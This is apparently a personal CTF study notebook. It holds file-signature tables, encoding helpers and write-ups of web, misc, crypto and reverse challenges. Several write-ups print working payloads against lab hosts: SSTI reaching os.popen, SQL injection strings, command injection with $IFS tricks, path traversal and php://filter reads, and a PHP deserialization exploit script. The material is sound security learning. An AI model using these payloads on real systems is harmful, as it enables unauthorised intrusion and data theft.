CTF Note

常见文件头部 Magic Bytes

描述扩展名Magic Number
Adobe Illustrator.ai25 50 44 46 [%PDF]
Bitmap graphic.bmp42 4D [BM]
Class File.classCA FE BA BE
JPEG graphic file.jpgFF D8
JPEG 2000 graphic file.jp20000000C6A5020200D0A [….jP..]
GIF graphic file.gif47 49 46 38 [GIF8]
TIF graphic file.tif49 49 [II]
PNG graphic file.png89 50 4E 47 .PNG
WAV audio file.wav52 49 46 46 RIFF
ELF Linux EXE.elf7F 45 4C 46 .ELF
Photoshop Graphics.psd38 42 50 53 [8BPS]
Windows Meta File.wmfD7 CD C6 9A
MIDI file.mid4D 54 68 64 [MThd]
Icon file.ico00 00 01 00
MP3 file with ID3 identity tag.mp349 44 33 [ID3]
AVI video file.avi52 49 46 46 [RIFF]
Flash Shockwave.swf46 57 53 [FWS]
Flash Video.flv46 4C 56 [FLV]
Mpeg 4 video file.mp400 00 00 18 66 74 79 70 6D 70 34 32 [….ftypmp42]
MOV video file.mov6D 6F 6F 76 [….moov]
Windows Video file.wmv30 26 B2 75 8E 66 CF
Windows Audio file.wma30 26 B2 75 8E 66 CF
PKZip.zip50 4B 03 04 [PK]
GZip.gz1F 8B 08
Tar file.tar75 73 74 61 72 [ustar] (at offset 257, not at the start of the file)
Microsoft Installer.msiD0 CF 11 E0 A1 B1 1A E1
Object Code File.obj4C 01
Dynamic Library.dll4D 5A [MZ]
CAB Installer file.cab4D 53 43 46 [MSCF]
Executable file.exe4D 5A [MZ]
RAR file.rar52 61 72 21 1A 07 00 [Rar!…]
SYS file.sys4D 5A [MZ]
Help file.hlp3F 5F 03 00 [?_..]
VMWare Disk file.vmdk4B 44 4D 56 [KDMV]
Outlook Post Office file.pst21 42 44 4E 42 [!BDNB]
PDF Document.pdf25 50 44 46 [%PDF]
Word Document.docD0 CF 11 E0 A1 B1 1A E1
RTF Document.rtf7B 5C 72 74 66 31 [{\rtf1]
Excel Document.xlsD0 CF 11 E0 A1 B1 1A E1
PowerPoint Document.pptD0 CF 11 E0 A1 B1 1A E1
Visio Document.vsdD0 CF 11 E0 A1 B1 1A E1
DOCX (Office 2010).docx50 4B 03 04 [PK]
XLSX (Office 2010).xlsx50 4B 03 04 [PK]
PPTX (Office 2010).pptx50 4B 03 04 [PK]
Microsoft Database.mdb53 74 61 6E 64 61 72 64 20 4A 65 74
Postcript File.ps25 21 [%!]
Outlook Message File.msgD0 CF 11 E0 A1 B1 1A E1
EPS File.eps25 21 50 53 2D 41 64 6F 62 65 2D 33 2E 30 20 45 50 53 46 2D 33 20 30
Jar File.jar50 4B 03 04 14 00 08 00 08 00
SLN File.sln4D 69 63 72 6F 73 6F 66 74 20 56 69 73 75 61 6C 20 53 74 75 64 69 6F 20 53 6F 6C 75 74 69 6F 6E 20 46 69 6C 65
Zlib File.zlib78 9C
SDF File.sdf78 9C

python各版本对应的magic头

Python 2.7|03f30d0a 00000000
Python 3.0|3b0c0d0a 00000000
Python 3.1|4f0c0d0a 00000000
Python 3.2|6c0c0d0a 00000000
Python 3.3|9e0c0d0a 00000000 00000000
Python 3.4|ee0c0d0a 00000000 00000000
Python 3.5|170d0d0a 00000000 00000000
Python 3.6|330d0d0a 00000000 00000000
Python 3.7|420d0d0a 00000000 00000000 00000000
Python 3.8|550d0d0a 00000000 00000000 00000000
Python 3.9|610d0d0a 00000000 00000000 00000000
Python 3.10|6f0d0d0a 00000000 00000000 00000000

Misc 思维导图

ctf-杂项-思维导图

ASCII表

ascii

dagger alphabet

image-20230714003015911

Use wireshark filter data

http.request.method == POST and http contains "admin"
ip.src eq 192.168.1.107 or ip.dst eq 192.168.1.107 and ip.addr == 192.168.1.107
tcp.port == 80 and udp.dstport == 80 or tcp.srcport <= 10000
tcp|udp|arp|icmp|http|smtp|ftp|dns|msnms|ip|ssl|not oicq|!bootp
eth.dst == A0:00:00:04:C5:84 and eth.src eq A0:00:00:04:C5:84 or eth.addr eq A0:00:00:04:C5:84
http.request.method == "GET" or http.request.method == "POST"
http.request.uri == "/img/logo-edu.gif" or http.request.uri contains "/img/logo-edu.gif" or http contains "GET"

Use ctf-party

require 'ctf_party'
require 'base64'
# The bare string literal below is evaluated and discarded; it works as an
# inline cheat sheet of the helper families ctf-party adds to String.
'''
base64: to_b64, from_b64, b64? and bang versions
digest: md5, sha1, etc. and bang versions
flag: flag, flag!, flag? (apply/check a flag format)
rot: rot, rot13, rot_all and bang versions
hex: hex2dec, dec2hex, to_hex, from_hex, str2hex, hex2str, hex2bin, bin2hex, from_hexip, to_hexip and bang versions
case: randomcase, alternatecase and bang versions
cgi: urlencode, urlencode_component, urldecode, urldecode_component, htmlescape, htmlunescape and bang versions
bin: to_bin, from_bin, str2bin, bin2str, hex2bin, bin2hex and bang versions
leet: leet and bang version
dec: dec2str, str2dec, hex2dec, dec2hex and bang versions
xor: ulxor, alxor, urxor, arxor and bang versions
misc: istrip and bang version
'''
flag = 'flag{xs}'
# Standard-library encoding, printed for comparison with the gem helper below.
p Base64.strict_encode64(flag)
# Checks the string against a flag format (see the "flag:" entry above).
p flag.flag?
# NOTE(review): bang version — presumably rewrites `flag` in place, so any later
# use of `flag` would see the Base64 text; confirm against the gem docs.
p flag.to_b64!
p 'SGVsbG8gd29ybGQh'.b64?
p 'mystr'.rot13
p 'mystr'.rot(shift: 11)
p 'mystr'.sha2_512
p "flag".to_bin
p "https://xinghuo.xfyun.cn/desk".urlencode_component
# Define an array
arr = [1, 2, 3, 4, 5]
# Walk the array by index with a for loop
for i in 0..arr.length-1
  # When i is even, print arr[i] (the print itself is commented out)
  if i % 2 == 0
    # p arr[i]
  end
end

Use dd

dd if=源文件名 bs=1 skip=开始分离的字节数 of=目标文件名
#参数说明:
if=file #输入文件名,缺省为标准输入。
of=file #输出文件名,缺省为标准输出。
bs=bytes #同时设置读写块的大小为 bytes ,可代替 ibs 和 obs 。
skip=blocks #从输入文件开头跳过 blocks 个块后再开始复制。
#以IDF实验室“抓到一只苍蝇”为例,需要将获得的文件去除前364个字节:
dd if=s1 bs=1 skip=364 of=d1
#使用dd命令分离文件格式如下:
dd if=源文件名 bs=1 skip=开始分离的字节数 of=目标文件名

文件合并

#将所有以chapter开头的文件按文件名从小到大的顺序合并,输出到book文件中
cat chapter01 chapter02 chapter03 > book

file headers

#![allow(unused)]
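fn main() {
    // (label, leading bytes as upper-case hex) for recognising a file by the
    // bytes at offset 0. Every entry is a whole number of bytes; several of the
    // original strings had dropped, doubled or swapped nibbles and could never
    // match a real file.
    let header_vec = vec![
        // FFD8FF is shared by all JPEGs; the former FFD8FFE1 matched EXIF files only.
        ("JPEG", "FFD8FF"),
        ("png", "89504E47"),
        ("gif", "47494638"),
        // Little-endian TIFF ("II*\0"); big-endian files start with 4D4D002A instead.
        ("tiff", "49492A00"),
        // "BM" only: the bytes after it are the file-size field and differ per file.
        ("bmp", "424D"),
        // "PK\x03\x04" (was "504B304", seven hex digits).
        ("zip", "504B0304"),
        ("rar", "52617221"),
        ("psd", "38425053"),
        // "{\rtf" (was "785C727466", which starts with 'x' instead of '{').
        ("rtf", "7B5C727466"),
        ("xml", "3C3F786D6C"),
        // NOTE(review): "html>" is not a signature at offset 0; HTML is plain text
        // and has no fixed leading bytes, so treat this entry as a content hint only.
        ("html", "68746D6C3E"),
        // "%PDF-1." (was "2550444662D312E", fifteen hex digits).
        ("pdf", "255044462D312E"),
        // A WAV file starts with "RIFF"; the "WAVE" tag (57415645) sits at offset 8
        // and is what separates it from other RIFF containers such as AVI.
        ("wav", "52494646"),
        // Classic pcap as written on little-endian hosts (was "4D3C2B1A", nibbles
        // swapped). Big-endian writers produce A1B2C3D4; pcapng starts with 0A0D0D0A.
        ("pcap", "D4C3B2A1"),
    ];
}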

Image RGB 分层

[dependencies]
image = "0.23"
#![allow(unused)]
fn main() {
/// Splits `xx_00029.png` into three RGB images, each keeping a single colour
/// channel (red, green, blue in that order) and leaving the other two at zero,
/// then writes them as `output_layer1.png` .. `output_layer3.png`.
///
/// Panics if the input cannot be opened or an output cannot be written.
fn fen_rgb_ceng() {
    // Load the source picture and read its size.
    let img = image::open("xx_00029.png").unwrap();
    let (width, height) = img.dimensions();
    // One blank canvas per channel; array index == channel index.
    let mut layers = [
        image::RgbImage::new(width, height),
        image::RgbImage::new(width, height),
        image::RgbImage::new(width, height),
    ];
    // Copy channel k of every source pixel into channel k of layer k.
    for y in 0..height {
        for x in 0..width {
            let source = img.get_pixel(x, y);
            for (channel, layer) in layers.iter_mut().enumerate() {
                layer.get_pixel_mut(x, y).0[channel] = source.0[channel];
            }
        }
    }
    // Write the layers out in channel order.
    let targets = ["output_layer1.png", "output_layer2.png", "output_layer3.png"];
    for (layer, target) in layers.iter().zip(targets.iter()) {
        layer.save(target).unwrap();
    }
}
}

get RGBA vec

#![allow(unused)]
fn main() {
    // Open the frame and read its dimensions; panics if the file is unreadable.
    let image = image::open("xx_00034.png").unwrap();
    let (width, height) = image.dimensions();
    let mut rgba_vec: Vec<(u8, u8, u8, u8)> = Vec::new();
    let mut buf: Vec<u8> = Vec::new();
    // Row-major scan that keeps only pixels whose RGB is exactly (254,254,254)
    // or (0,0,0); the alpha value is carried along but not tested.
    for y in 0..height {
        for x in 0..width {
            let [r, g, b, a] = image.get_pixel(x, y).0;
            let is_near_white = (r, g, b) == (254, 254, 254);
            let is_black = (r, g, b) == (0, 0, 0);
            if is_near_white || is_black {
                rgba_vec.push((r, g, b, a));
            }
        }
    }
}

create image from RGBA vec

#![allow(unused)]
fn main() {
/// Lays `rgba_vec` out row by row on a square canvas and saves it as `output.png`.
///
/// The side length is the integer part of `sqrt(rgba_vec.len())`, so when the
/// length is not a perfect square the trailing entries are left out.
/// Panics if the image cannot be written.
fn create_image_from_rgba_vec(rgba_vec: Vec<(u8, u8, u8, u8)>) {
    let side = f64::sqrt(rgba_vec.len() as f64) as u32;
    let (width, height) = (side, side);
    // Blank canvas of side x side pixels.
    let mut img: ImageBuffer<Rgba<u8>, Vec<_>> = ImageBuffer::new(width, height);
    // Pixel (x, y) takes entry y * width + x of the input.
    for (x, y, pixel) in img.enumerate_pixels_mut() {
        let (r, g, b, a) = rgba_vec[(y * width + x) as usize];
        pixel.0 = [r, g, b, a];
    }
    // Write the result to disk.
    img.save("output.png").unwrap();
}
}

RSA 参数解释

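RSA 使用公钥与私钥配对来进行加密和解密。其中,p、q 是两个大素数,$n = pq$,$\varphi(n) = (p-1)(q-1)$ 是欧拉函数值,e 是与 $\varphi(n)$ 互质的整数,d 是满足 $e \cdot d \equiv 1 \pmod{\varphi(n)}$ 的整数,m 是明文,c 是密文;加密为 $c \equiv m^e \pmod{n}$,解密为 $m \equiv c^d \pmod{n}$。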

compress and decompress zlib

import zlib
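# Compress the sample bytes
data = b'Hello, world!'
compressed_data = zlib.compress(data)
print('Compressed data:', compressed_data)
# Decompress again. The zlib module has no `uncompress` function; the inverse
# of zlib.compress() is zlib.decompress().
uncompressed_data = zlib.decompress(compressed_data)
print('Uncompressed data:', uncompressed_data)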

Simple_SSTI_1

# %27 means '
# %20 means space
http://114.67.175.224:11296/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}

Simple_SSTI_2

http://114.67.175.224:16482/?flag={{config}}
flag{46fe7552dcee5c1bba675349353506d5}

Flask_FileUpload

1.echo "import os\nos.system('cat ./flag')" > get_floag.txt
2.mv get_flag.txt get_flag.jpg
3.upload get_flag.jpg
flag{e58da7f2b3307deb9eb1d276cb8d524a}

Simple image

download the image
1.mv image.png image.html
2.cat image.html
3.get "107;&#101;&#121;&#123;&#121;&#111;&#117;&#32;&#97;&#114;&#101;&#32;&#114;&#105;&#103;&#104;&#116;&#125" to Vec<u8>
4.decode Vec<u8> to string get key{you are right}

shihua Write up

1.  hxxx Flag:flag{flag_in_hexdecimal:)} 3.  map Flag:flag{mapisthekey} 4.  bxxwxx Flag:ctf{show_me_the_money}

binwalk -e bxxwxx
cd _bxxwxx.extracted
cat flag.txt

5.  Zip0 Flag:flag{pseudo_encryption}

use imhex open zip0.zip
remove password
save zip0.zip
open flag.png

6.  sxxxhxxx flag:ctf{welcom_to_upc_im}

steghide extract -sf stxxhxxx.jpeg
cat info

7.  Caesar Flag:flag{this_is_rot_14:)} 8.  Vig Flag:flag{vigenere_cipher} 9.  xor Flag:flag{flag1sxor} 10.  Easyre Flag:flag{this_Is_a_EasyRe}

BUUCTF

Linux Labs 1

1.run "ssh -p 29381 root@node4.buuoj.cn" to connect ssh
2.enter password 123456
3.cd ..
4.cat flag.txt
flag{374920b5-66a9-4779-9172-5176eae58b85}

BUU LFI COURSE 1

http://81402a4e-a4c6-493f-b96e-8bf140d81bec.node4.buuoj.cn:81/?file=../../../flag
flag{241f21aa-3d5b-4540-9afb-3d1fd7da9197}

BUU BRUTE 1

url = "http://d1c5dde5-7e42-4f0a-a0a4-464717740958.node4.buuoj.cn:81/?username=admin&password={1000..10000}"
1.for loop get body
2.if body contains("flag") println body

BUU SQL COURSE 1

1. open http://29c00a23-aea5-4f2d-a2b8-d4f24d8eea48.node4.buuoj.cn:81/backend/content_detail.php?id=-1%20union%20select%201,(select%20group_concat(username)%20from%20admin) to get username
2. open http://29c00a23-aea5-4f2d-a2b8-d4f24d8eea48.node4.buuoj.cn:81/backend/content_detail.php?id=-1%20union%20select%201,(select%20group_concat(password)%20from%20admin) to get user password
3. enter username and password clock login to see flag

[极客大挑战 2019]EasySQL

username:admin' or 1=1#
password:123456
flag{331c23f4-983a-4a29-b38a-d9c93b1734f2}

[HCTF 2018]WarmUp

1. ? URL ecode => %3F
2. %3F URL ecode => %253F
3. open url to get flag http://290d8b27-9f57-4e6e-b2b6-42bc0991ede1.node4.buuoj.cn:81/?file=source.php%253F../../../../../ffffllllaaaagggg
4. or open http://290d8b27-9f57-4e6e-b2b6-42bc0991ede1.node4.buuoj.cn:81/?file=source.php?../../../../../ffffllllaaaagggg

[极客大挑战 2019]Havefun

1.open source code cansee this
`
<!--
$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
echo 'Syc{cat_cat_cat_cat}';
}
-->
`
2. parse cat param http://352c414e-7254-40cc-b802-f66498fc1bd4.node4.buuoj.cn:81/?cat=dog get flag

[ACTF2020 新生赛]Include

1. click tip to open http://4237a679-489a-465c-9936-d7b0d68aba04.node4.buuoj.cn:81/?file=flag.php
2. open hackbar load url and change ?file=flag.php to ?file=php://filter/read=convert.base64-encode/resource=flag.php
3. copy base64 and open base_64.py decode base64 can see flag

[ACTF2020 新生赛]Exec

1.enter 127.0.0.1;ls click Enter can see we can run cmd
2.enter 127.0.0.1;ls ../../../;cat ../../../flag  can get flag
flag{8d209996-9c2b-48e8-bdac-3b6ae15fb98b}

[强网杯 2019]随便注

1. enter "1';show databases#" and click submit can se all databases
2. enter "1';use supersqli;show tables#" and click submit canse all tables in supersqli
3. enter "1';use supersqli;show columns from `1919810931114514`#" and click submit
4. enter "1';use supersqli;show columns from words#" and click submit
5. enter "1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`;alter table `words` change `flag` `id` varchar(100);#" and click submit
6. enter "1' or 1=1#" an click can see flag

[GXYCTF2019]Ping Ping Ping25

1. URL/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php see source code cansee flag

[SUCTF 2019]EasySQL

1. enter "1;show databases;"
2. "1;show tables;"
3. "1;set sql_mode=pipes_as_concat;select 1"

MD5

https://buuoj.cn/challenges#MD5
1.unzip file and open .txt copy md5 code
2.open https://www.bejson.com/enc/md5dsc/ tp decode MD5 code
flag{admin1}

一眼就解密

https://buuoj.cn/challenges#%E4%B8%80%E7%9C%BC%E5%B0%B1%E8%A7%A3%E5%AF%86
1.canse it's a base64 code
2.so decode base64 can get the flag

Url编码

1.unzip file and open .txt copy url code
1.can find that is a URL encoded
2.so decode the code
flag{and 1=1}

看我回旋踢

1.unzip file and open .txt copy url code
1.can find that is a synt encoded 凯撒密码
2.so decode the code use python/caesar_cipher.py
flag{5cd1004d-86a5-46d8-b720-beb5ba0417e1}

摩丝

1. unzip file and open .txt copy morse code
2. decode morse code with rust can get the flag
flag{ILOVEYOU}

password

1. unzip file and open .txt
2. can see the kay is 10 letter
3. so 张三 to zs and key{zs19900315}
flag{zs19900315}

[极客大挑战 2019]Secret File

1. open and view page source
2. open URL/Archive_room.php and view page source
3. copy URL/action.php open 3 times
4. open fiddler click  URL/action.php can see
`
<!DOCTYPE html>
<html>
<!--
secr3t.php
-->
</html>
`
5. open URL/secr3t.php can see flag.php but can't see it
6. so open URL/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
7. decode base64 can get flag
flag{9835de9d-5d61-4551-9b44-0c1955464828}

[极客大挑战 2019]LoveSQL

1. open URL/check.php?username=admin' or '1'='1&password=1
2. open URL/check.php?username=1' union select 1,2,3%23&password=1
3. open URL/check.php?username=1' union select 1,database(),version()%23&password=1
4. open URL/check.php?username=1' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 %23&password=1  get geekuser is password
5. open URL /check.php?username=1' union select 1,2,group_concat(concat_ws(0x7e,username,password)) from geek.l0ve1ysq1 %23&password=1
os open /check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
can see flag

N1book 题目

第一章Web 第一题

本测试题来自N1BOOK,考察常见的信息收集能力。flag被分割成3块,藏在3处,你能都找出来么?

dirsearch -u http://eci-2ze4nzykqjiplw5d5h8b.cloudeci1.ichunqiu.com/

image-20230605120217241 open http://eci-2ze4nzykqjiplw5d5h8b.cloudeci1.ichunqiu.com/flag1_is_her3_fun.txt get flag1 flag{info_1

#get flag3
vim -r index.php.swp
# p0rtant_hack}

image-20230605115957399 open http://eci-2ze4nzykqjiplw5d5h8b.cloudeci1.ichunqiu.com/index.php~ get flag2 s_v3ry_im flag{info_1s_v3ry_imp0rtant_hack}

CTF 初赛 WriteUP

1 签到

strings qiandao.bmp

image-20230606161057495 flag{c545574d-9ce4-4ce7-997c-1f281d54a7c2}

2 ARP-1

分析流量包发现只有一个字母变化 image-20230606162223573 flag{2cbd116b-5fe9-4252-b9d9-7d794a519d59}

5 cc_1

已知 image-20230606161312058 点击魔法棒 image-20230606161517274 得到flag image-20230606161605814 flag{e84a3130-c4b9-492c-9ab2-d395a43cbc31}

8 re_ez

用ghidra打开re1.exe,经过分析发现在.data section存在一下数据

// .data
// ram:14002a000-ram:14002a1ff
//
DAT_14002a000          XREF[1]:     14000024c(*)
14002a000 01              ??         01h
14002a001 00              ??         00h
14002a002 00              ??         00h
14002a003 00              ??         00h
14002a004 00              ??         00h
14002a005 00              ??         00h
14002a006 00              ??         00h
14002a007 00              ??         00h
14002a008 01              ??         01h
14002a009 00              ??         00h
14002a00a 00              ??         00h
14002a00b 00              ??         00h
14002a00c 00              ??         00h
14002a00d 00              ??         00h
14002a00e 00              ??         00h
14002a00f 00              ??         00h
14002a010 01              ??         01h
14002a011 00              ??         00h
14002a012 00              ??         00h
14002a013 00              ??         00h
14002a014 01              ??         01h
14002a015 00              ??         00h
14002a016 00              ??         00h
14002a017 00              ??         00h
14002a018 00              ??         00h
14002a019 00              ??         00h
14002a01a 00              ??         00h
14002a01b 00              ??         00h
14002a01c 01              ??         01h
14002a01d 00              ??         00h
14002a01e 00              ??         00h
14002a01f 00              ??         00h
14002a020 00              ??         00h
14002a021 00              ??         00h
14002a022 00              ??         00h
14002a023 00              ??         00h
14002a024 01              ??         01h
14002a025 00              ??         00h
14002a026 00              ??         00h
14002a027 00              ??         00h
14002a028 01              ??         01h
14002a029 00              ??         00h
14002a02a 00              ??         00h
14002a02b 00              ??         00h
14002a02c 00              ??         00h
14002a02d 00              ??         00h
14002a02e 00              ??         00h
14002a02f 00              ??         00h
14002a030 01              ??         01h
14002a031 00              ??         00h
14002a032 00              ??         00h
14002a033 00              ??         00h
14002a034 00              ??         00h
14002a035 00              ??         00h
14002a036 00              ??         00h
14002a037 00              ??         00h
14002a038 01              ??         01h
14002a039 00              ??         00h
14002a03a 00              ??         00h
14002a03b 00              ??         00h
14002a03c 01              ??         01h
14002a03d 00              ??         00h
14002a03e 00              ??         00h
14002a03f 00              ??         00h
14002a040 00              ??         00h
14002a041 00              ??         00h
14002a042 00              ??         00h
14002a043 00              ??         00h
14002a044 00              ??         00h
14002a045 00              ??         00h
14002a046 00              ??         00h
14002a047 00              ??         00h
14002a048 00              ??         00h
14002a049 00              ??         00h
14002a04a 00              ??         00h
14002a04b 00              ??         00h
14002a04c 01              ??         01h
14002a04d 00              ??         00h
14002a04e 00              ??         00h
14002a04f 00              ??         00h
14002a050 01              ??         01h
14002a051 00              ??         00h
14002a052 00              ??         00h
14002a053 00              ??         00h
14002a054 01              ??         01h
14002a055 00              ??         00h
14002a056 00              ??         00h
14002a057 00              ??         00h
14002a058 01              ??         01h
14002a059 00              ??         00h
14002a05a 00              ??         00h
14002a05b 00              ??         00h
14002a05c 01              ??         01h
14002a05d 00              ??         00h
14002a05e 00              ??         00h
14002a05f 00              ??         00h
14002a060 01              ??         01h
14002a061 00              ??         00h
14002a062 00              ??         00h
14002a063 00              ??         00h

由于提示迷宫为5*5,把上面的数据每五个一组,得到下面的数据

1000 0000 1000 0000 1000
1000 0000 1000 0000 1000
1000 0000 1000 0000 1000
1000 0000 0000 0000 1000
1000 1000 1000 1000 1000

在伪代码 sub_140001130()函数发现了 image-20230608145330026 把后面的零去掉得到

1 0 1 0 1    #左上0是迷宫入口,右上0是迷宫出口
1 0 1 0 1
1 0 1 0 1
1 0 0 0 1
1 1 1 1 1
#	 “	 !	  space
上	下	左	 右
得到
"""spacespace### =>"""  ###

ghidra 看strings发现flag是迷宫的md5值 image-20230606165635939 得到 image-20230606170144258 flag{c4eb11b0e0a3cbeed7df057deaec18aa}

just serialize

task.php

<?php
// Challenge page: prints its own source, then unserializes a request parameter.
show_source(__FILE__);
// Holds a path; converting the object to a string lists that path with scandir().
class Secret
{
    public $filename;
    public function __construct($filename)
    {
        $this->filename = $filename;
    }
    // Returns one of two fixed strings depending on how many entries scandir()
    // reports for $this->filename, so the output reveals whether anything matched.
    public function __toString()
    {
        $num = count(scandir($this->filename));
        if ($num > 0) {
            return '什么也没有';
        } else {
            return 'flag_';
        }
    }
}
// Echoes $text when the object is destroyed; if $text holds an object, echo
// converts it through that object's __toString().
class Read
{
    public $text = '什么东西';
    public function __destruct()
    {
        echo $this->text;
    }
}
// NOTE(review): unserialize() is fed a raw query parameter, so the request picks
// which classes are instantiated and what their properties contain; the
// __destruct -> __toString -> scandir chain above then runs on that data.
// Outside a deliberately vulnerable exercise, decode a data-only format such as
// JSON, or pass ['allowed_classes' => false] as the second argument.
$a = unserialize($_GET['p']);

payload.php

<?php
// Local stand-ins for the two classes declared in task.php: same names and
// property names, no methods.
class Secret
{
    public $filename;
}
class Read
{
    public $text;
}
// Builds a Read whose $text is a Secret and prints its serialized form; the
// expected output is kept in the trailing comment.
$a = new Read();
$b = new Secret();
$b->filename = "glob://flag_xxskxnsknxakbsx.txt.*";
$a->text =$b;
echo "\n";
echo serialize($a);
// O:4:"Read":1:{s:4:"text";O:6:"Secret":1:{s:8:"filename";s:33:"glob://flag_xxskxnsknxakbsx.txt.*";}}
?>

exp.py

import requests
import string
from urllib.parse import quote
# `pwd` is built but never read below; the loop iterates over `S`.
pwd = string.ascii_lowercase + string.digits
S = 'abcdefghijklmnopqrstuvwxyz0123456789.'
url = "http://127.0.0.1:7777/task.php"
# Query-string template for the serialized Read -> Secret object from payload.php;
# the two {} slots take the filename's length and the filename itself.
payload = '?p=O:4:"Read":1:{{s:4:"text";O:6:"Secret":1:{{s:8:"filename";s:{}:"{}";}}}}'
url += payload
if __name__ == "__main__":
    flag = 'glob://flag_'
    # NOTE(review): when no character in S is accepted for a position, the inner
    # loop finishes without growing `flag`, and this while loop never ends.
    while len(flag)<40:
        for i in S:
            tmp = flag + i + '*'
            r = requests.get(url.format(len(tmp), tmp))
            # task.php returns 'flag_' when scandir() reports no entries, so its
            # absence from the last 50 characters marks a pattern that matched.
            if 'flag_' not in r.text[-50:]:
                flag += i
                break
        print(flag)

exp.rs

#![allow(unused)]
fn main() {
use crate::http;
/// Rust port of the exp.py loop: grows a `glob://flag_` prefix one character at
/// a time by requesting task.php with a serialized Read -> Secret object and
/// printing the prefix after each pass.
///
/// Panics (with an empty message) if a request fails.
pub fn just_serialize(){
    let alphabet = "abcdefghijklmnopqrstuvwxyz0123456789.";
    let url = "http://127.0.0.1:7777/task.php";
    let mut flag = "glob://flag_".to_string();
    // NOTE(review): if no character is accepted for a position, `flag` stops
    // growing and this loop does not terminate.
    while flag.len() < 50 {
        for i in alphabet.chars(){
            let temp = format!("{}{}*",flag,i);
            // Shadows the base `url` with the full request URL for this candidate.
            let url = format!("{}?p=O:4:\"Read\":1:{{s:4:\"text\";O:6:\"Secret\":1:{{s:8:\"filename\";s:{}:\"{}\";}}}}",url,temp.len(),temp);
            let r = http::get(&url).expect("");
            // presumably r.1 is the response body — confirm against crate::http.
            // task.php ends its output with "flag_" when nothing matched.
            if !r.1.ends_with("flag_") {
                flag.push(i);
                break;
            }
        }
        println!("{}",flag);
    }
}
}

流量分析实战

filter http 发现 有两个可疑文件 image-20230608170605207 image-20230608170545618 导出这两个php image-20230608171015744 image-20230608171049710

image-20230608171116488

复制粘贴到01editor 保存为demo.zip image-20230609122944950 破解得到密码为hackerme8888 解压得到flag.txt flag{2c094ea0-088c-440e-b6da-472e1bec6239}

spiral 螺旋矩阵

已知图片spiral.png spiral image-20230609154832720 解密base64得到: flag{fake_flag} But RGBA色彩空间缺一不可哦~ 我教你还原:aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0dXX3dnL2FydGljbGUvZGV0YWlscy8xMjA0MDYxOTI=

echo aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0dXX3dnL2FydGljbGUvZGV0YWlscy8xMjA0MDYxOTI= | base64 -d

https://blog.csdn.net/GW_wg/article/details/120406192 根据图片得到了图片加密的代码task.py

def function(n):
    """Build an n x n matrix holding 1..n*n in clockwise spiral order.

    Numbering starts in the top-left corner and winds inwards ring by ring.
    """
    grid = [[0 for _ in range(n)] for _ in range(n)]
    counter = 1
    # The original's four bounds move in lockstep, so one low/high pair is enough.
    lo, hi = 0, n - 1
    while lo < hi:
        # top edge, left to right
        for col in range(lo, hi):
            grid[lo][col] = counter
            counter += 1
        # right edge, top to bottom
        for row in range(lo, hi):
            grid[row][hi] = counter
            counter += 1
        # bottom edge, right to left
        for col in range(hi, lo, -1):
            grid[hi][col] = counter
            counter += 1
        # left edge, bottom to top
        for row in range(hi, lo, -1):
            grid[row][lo] = counter
            counter += 1
        lo += 1
        hi -= 1
    # An odd side length leaves one centre cell that no ring covers.
    if n % 2 != 0:
        grid[n // 2][n // 2] = counter
    return grid

写出下面的代码exp.py

from PIL import Image
def spiral_order(matrix):
    """Read a list of rows clockwise from the top-left corner, ring by ring.

    The rows are consumed while reading, so `matrix` is left empty afterwards.

    :param matrix: list of row lists
    :return: flat list of the elements in spiral order
    """
    collected = []
    if not matrix:
        return collected
    while matrix:
        # top edge
        collected += matrix.pop(0)
        # right edge, top to bottom
        if matrix and matrix[0]:
            collected += [row.pop() for row in matrix]
        # bottom edge, right to left
        if matrix:
            collected += reversed(matrix.pop())
        # left edge, bottom to top
        if matrix and matrix[0]:
            collected += [row.pop(0) for row in reversed(matrix)]
    return collected
def reconstruct_image(image_path):
    """Re-order an image's pixels by reading them in spiral order and show the result.

    :param image_path: path of the picture to open
    """
    source = Image.open(image_path)
    # Work on RGBA so the alpha channel is carried through unchanged.
    rgba = source.convert("RGBA")
    flat = list(rgba.getdata())
    width, height = source.size
    # Cut the flat pixel list into `height` rows of `width` pixels.
    rows = [flat[r * width:(r + 1) * width] for r in range(height)]
    # Pixel sequence obtained by walking the rows in spiral order.
    unrolled = spiral_order(rows)
    # Same size canvas, filled row by row with the unrolled sequence.
    rebuilt = Image.new("RGBA", (width, height))
    rebuilt.putdata(unrolled)
    # Display only; saving is left commented out.
    rebuilt.show()
    # rebuilt.save("new.png")
# Example usage: runs on import and expects spiral.png in the working directory.
reconstruct_image("spiral.png")

把代码形成的new.png 用stegsolve打开 image-20230609155622535 在alpha通道得到了密码:mUv8vvGRMNK5mgbxPNsH 用密码解压得到flag image-20230609160056361

IchunqiuCTF

Quoted-printable

1.unzip file and open .txt copy text code
2.use quoted_printable_cli -d text to decode
flag{那你也很棒哦}

zero_one

ctf-party "01001100011010010011000" from_bin

RSA

1.use rsa.py get d

Wiener’s RSA Attack

import gmpy2
import libnum
def continuedFra(x, y):
    """Expand the fraction x / y into its continued-fraction terms.

    :param x: numerator
    :param y: denominator
    :return: list of partial quotients (empty when y is 0)
    """
    terms = []
    while y != 0:
        quotient, remainder = divmod(x, y)
        terms.append(quotient)
        x, y = y, remainder
    return terms
def gradualFra(cf):
    """Fold a list of continued-fraction terms into one fraction.

    :param cf: list of continued-fraction terms
    :return: pair of integers with the denominator of the value first, e.g.
        [0, 1, 2] (the value 2/3) gives (3, 2); an empty list gives (0, 1)
    """
    upper, lower = 0, 1
    # Work from the innermost term outwards; each step inverts the running
    # fraction and adds the next term, which is why the pair ends up swapped.
    for term in reversed(cf):
        upper, lower = lower, term * lower + upper
    return upper, lower
def solve_pq(a, b, c):
    """Solve a*x^2 + b*x + c = 0 with the quadratic formula in integer arithmetic.

    Used with Vieta's relations: p and q are the roots of x^2 - (p+q)*x + p*q = 0.

    :param a: coefficient of x^2
    :param b: coefficient of x
    :param c: constant term (p*q)
    :return: the two candidate roots, floor-divided, as a pair
    """
    # Integer square root of the discriminant.
    disc_root = gmpy2.isqrt(b * b - 4 * a * c)
    two_a = 2 * a
